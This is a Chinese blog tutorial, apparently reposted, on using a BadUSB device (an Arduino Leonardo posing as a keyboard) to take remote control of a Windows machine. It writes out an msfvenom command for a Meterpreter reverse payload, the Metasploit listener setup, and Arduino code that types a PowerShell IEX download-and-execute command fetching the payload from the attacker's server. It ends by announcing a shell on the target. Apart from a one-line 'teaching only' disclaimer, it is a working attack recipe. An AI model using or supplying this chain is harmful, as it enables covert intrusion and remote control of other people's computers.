首页 安全文摘 正文

利用badusb远程控制

0x01 badusb简介badusb大家应该都了解过,是利用伪造HID设备执行攻击载荷的一种攻击方式。HID设备一般指的是计算机直接与人交互的设备,例如键盘、鼠标等总的来说,就是将USB设备伪装成键盘设备,使目标主机被迫执行预置在固件中的恶意代码通常情况下都会把badusb制作成与U盘极其相似,且不会被受害者所察觉,badusb目前在淘宝有售,下面是详细的

利用badusb远程控制 BADUSB 安全文摘 安全文摘  第1张


0x01 badusb简介

badusb大家应该都了解过,是利用伪造HID设备执行攻击载荷的一种攻击方式。HID设备一般指的是计算机直接与人交互的设备,例如键盘、鼠标等


总的来说,就是将USB设备伪装成键盘设备,使目标主机被迫执行预置在固件中的恶意代码


通常情况下都会把badusb制作成与U盘极其相似,且不会被受害者所察觉,badusb目前在淘宝有售,下面是详细的用badusb拿shell的过程


利用badusb远程控制 BADUSB 安全文摘 安全文摘  第2张

0x02 安装arduino IDE


Arduino ide是一款专业的arduino开发工具,主要用于arduino程序的编写和开发,拥有开放源代码的电路图设计、支持ISP在线烧,同时支持Flash、Max/Msp、VVVV、PD、C、Processing等多种程序兼容的特点


首先,官网下载Arduino IDE



利用badusb远程控制 BADUSB 安全文摘 安全文摘  第3张

下载好后进行安装,将badusb连接主机,配置环境


0x03 利用msf生成windows端木马


在msf中输入以下命令生成木马

msfvenom -p Windows/x64/Meterpreter_reverse_http LHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn> -f psh > 1.ps1

利用badusb远程控制 BADUSB 安全文摘 安全文摘  第4张

启动Apache2,将生成的1.ps1复制到/var/www/html中

serviceapache2 start
sudocp 1.ps1 /var/www/html

利用badusb远程控制 BADUSB 安全文摘 安全文摘  第5张

进入监听模式

useExploit/multi/handlerset Payload 
windows/meterpreter/reverse_tcp 
setLHOST172.16.7.130setLPORT4321
run

利用badusb远程控制 BADUSB 安全文摘 安全文摘  第6张

0x04 烧录

可以取得开发板信息确定是否连接

利用badusb远程控制 BADUSB 安全文摘 安全文摘  第7张

在工具中选择开发板:ArduinoLeonardo

选择合适的端口

编程器选择:USBasp

利用badusb远程控制 BADUSB 安全文摘 安全文摘  第8张

当写入代码后,首先点击第一个按钮进行验证,当显示编译完成则可点击上传进行烧录

利用badusb远程控制 BADUSB 安全文摘 安全文摘  第9张

代码的编写我们可以借助Automator_2.0.1这款辅助软件,编写代码更加方便

软件:https://github.com/Catboy96/Automator

利用badusb远程控制 BADUSB 安全文摘 安全文摘  第10张

代码格式介绍


setup() 函数

用来初始化变量、Pin模式、开始使用库等

每次打开或重置Arduino板后,setup()函数将只运行一次


loop() 函数

精确地执行其名称所建议的操作,并连续循环,从而允许程序更改和响应

//参考代码:#include<Keyboard.h> 
//包含键盘模块头文件voidsetup(){//初始化Keyboard.begin();
//开始键盘通信delay(1000);
//延时1000毫秒,Keyboard.press(KEY_LEFT_GUI);
//按下徽标键 也就是win键 Keyboard.press('r');
//按下r键 CMDdelay(500);Keyboard.release(KEY_LEFT_GUI);
//松掉win键Keyboard.release('r');
//松掉r键delay(500);Keyboard.println("powershell IEX (New-Object Net.WebClient).DownloadString('http://XXX.XXX.XXX.XXX/1.ps1')");Keyboard.press(KEY_RETURN); 
//按下回车键Keyboard.release(KEY_RETURN);
//释放回车键delay(500);Keyboard.end();
//结束键盘通讯}voidloop()
//循环,这里的代码{//循环体}



0x05 测试

将烧录好的badusb插入目标主机后,目标主机会自动按下“win+r”键,并自动输入:

powershell IEX (New-ObjectNet.WebClient).DownloadString('http://172.16.7.130/1.ps1')

拿shell成功!

利用badusb远程控制 BADUSB 安全文摘 安全文摘  第11张

本文章只用于教学,切勿用于非法用途

海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1633.html

相关推荐

从偶遇Flarum开始的RCE之旅

从偶遇Flarum开始的RCE之旅

事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程,请读者勿使用该漏洞进行未授权测试,否则作者不承担任何...

WEB安全 2022-08-21 0 10410

2022年蓝队初级护网总结

2022年蓝队初级护网总结

一. 设备误报如何处理? 答:来自外网的误报说明安全设备需要进行策略升级,不需要处置。如果是来自内网的误报可以和负责人协商一下...

安全文摘 2022-08-21 0 10400

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持